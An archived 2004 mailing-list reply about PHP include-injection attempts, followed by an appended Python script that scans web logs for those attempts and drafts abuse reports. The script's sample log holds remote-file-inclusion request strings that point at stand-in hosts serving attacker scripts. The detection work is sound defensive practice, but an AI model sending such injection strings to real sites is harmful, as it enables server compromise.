Security Incidents mailing list archives

Re: PHP injection attempt from 200.222.244.154


From: Jez Hancock <jez.hancock () gmail com>
Date: Sun, 5 Dec 2004 00:00:50 +0000

On Mon, 22 Nov 2004 20:09:22 -0600, Kirby Angell <kangell () alertra com> wrote:
> Haha... note to self, do not include the actual attack URL in the
> message.  Judging from this referer:
>
> Referer:
> http://gmail.google.com/gmail?view=cv&search=inbox&th=10063111e32eb17b&lvp=-1&cvp=0&zx=18acabd2b173f0d8528652499
>
> I'd say someone got my message from this list and then clicked on the
> URLs  :-)

That's something I noticed - I only started to get injection attempts
on some URLs once that URL began to have content about the particular
injection technique/vulnerability.

For example in one weblog article I discussed the myegallery
vulnerability and within a week or so I noticed a massive increase in
the number of attacks on that article trying to employ injection
techniques to exploit the hole the article talked about!  I'd not
noticed any search engines in the referer logs, but just presumed this
was how the attack was being seeded.  Such a waste of bandwidth.

I'd thought about doing something similar to KEM Hosting's script
above regarding turning the tables or somehow automating an abuse
complaint procedure.  For a while I started to notify the owners of
domains that were hosting the injection scripts that they possibly had
a problem, but this got tedious quite quickly.  Automating the
procedure by intercepting the requests for bad URIs and redirecting
them to a script that drafts together an abuse report might be
interesting and save some time though.

-- 
Jez Hancock
 - System Administrator / PHP Developer

http://munk.nu/
http://freebsd.munk.nu/      - A FreeBSD Diary
http://ipfwstats.sf.net/        - ipfw peruser traffic logging
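As an added example (not code from the original post or from any of the people on this thread), the sketch below shows the log-scanning half of the abuse-report idea described above: it reads Apache combined-format access log lines, flags requests where a query parameter carries a remote http(s) URL (the PHP include-injection pattern the thread is about), records the host serving the injected script, and renders a plain-text abuse notice. It works offline over a log file rather than intercepting live requests; the log lines, IP addresses and hostnames are constructed, and the `abuse@<host>` recipient is a placeholder to be replaced with the network's real abuse contact.

```python
"""Scan access logs for PHP include-injection attempts and draft abuse notices.
Added example; all sample data below is constructed."""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines in Apache combined format. Hosts and addresses are
# invented (documentation ranges). The referer field is kept because, as the thread
# notes, it often shows where an attack was seeded from.
SAMPLE_LOG = """\
192.0.2.10 - - [05/Dec/2004:00:00:50 +0000] "GET /blog/myegallery-notes HTTP/1.1" 200 5120 "http://lists.example.net/archive/1234" "Mozilla/4.0"
192.0.2.11 - - [05/Dec/2004:00:01:02 +0000] "GET /gallery/index.php?path=http://injection.example.org/cmd.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.79"
198.51.100.7 - - [05/Dec/2004:00:01:30 +0000] "GET /blog/?p=3 HTTP/1.1" 200 4300 "http://munk.nu/" "Mozilla/5.0"
198.51.100.8 - - [05/Dec/2004:00:02:11 +0000] "GET /index.php?page=https://203.0.113.5/x.txt HTTP/1.0" 200 4000 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
REMOTE_URL_RE = re.compile(r"^https?://", re.IGNORECASE)


def find_injection_attempts(log_text, own_hosts=()):
    """Return one record per request whose query string passes a parameter a remote
    http(s) URL. own_hosts lists hostnames that belong to us, so legitimate links back
    to our own site are not reported."""
    own = {h.lower() for h in own_hosts}
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-combined-format line; skip it
        target = urlsplit(m.group("target"))
        params = parse_qs(target.query, keep_blank_values=True)
        for name, values in params.items():
            for value in values:
                if not REMOTE_URL_RE.match(value):
                    continue
                script_host = (urlsplit(value).hostname or "").lower()
                if not script_host or script_host in own:
                    continue
                hits.append({
                    "timestamp": m.group("ts"),
                    "source_ip": m.group("ip"),
                    "request": m.group("target"),
                    "param": name,
                    "injected_url": value,
                    "script_host": script_host,
                    "referer": m.group("referer"),
                })
    return hits


def group_by_script_host(hits):
    """Batch attempts per hosting domain so one notice per host can be sent."""
    groups = {}
    for hit in hits:
        groups.setdefault(hit["script_host"], []).append(hit)
    return groups


def draft_abuse_report(hit, reporter="webmaster@example.com"):
    """Render a plain-text abuse notice for the operator of the host serving the
    injected script. The To: address is a placeholder; the real abuse contact for
    that network must be looked up (e.g. via WHOIS) before anything is sent."""
    lines = [
        f"To: abuse@{hit['script_host']}  (placeholder; confirm the real abuse contact)",
        f"From: {reporter}",
        "Subject: Injection script hosted on your network",
        "",
        f"At {hit['timestamp']} the client {hit['source_ip']} requested",
        f"  {hit['request']}",
        f"on our server, passing parameter '{hit['param']}' a URL on your host:",
        f"  {hit['injected_url']}",
        "This looks like a PHP include-injection attempt using a script hosted on",
        "your system, which may itself be compromised. Please investigate.",
    ]
    return "\n".join(lines)


if __name__ == "__main__":
    for host, attempts in group_by_script_host(
            find_injection_attempts(SAMPLE_LOG, own_hosts={"munk.nu"})).items():
        print(f"== {host}: {len(attempts)} attempt(s) ==")
        print(draft_abuse_report(attempts[0]))
        print()
```

Feeding a real log through `find_injection_attempts` and eyeballing the `referer` column of the hits is the quickest way to confirm the pattern the thread describes (attacks seeded from a page that discussed the hole); the report text is deliberately a draft that a person reviews before it goes out.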
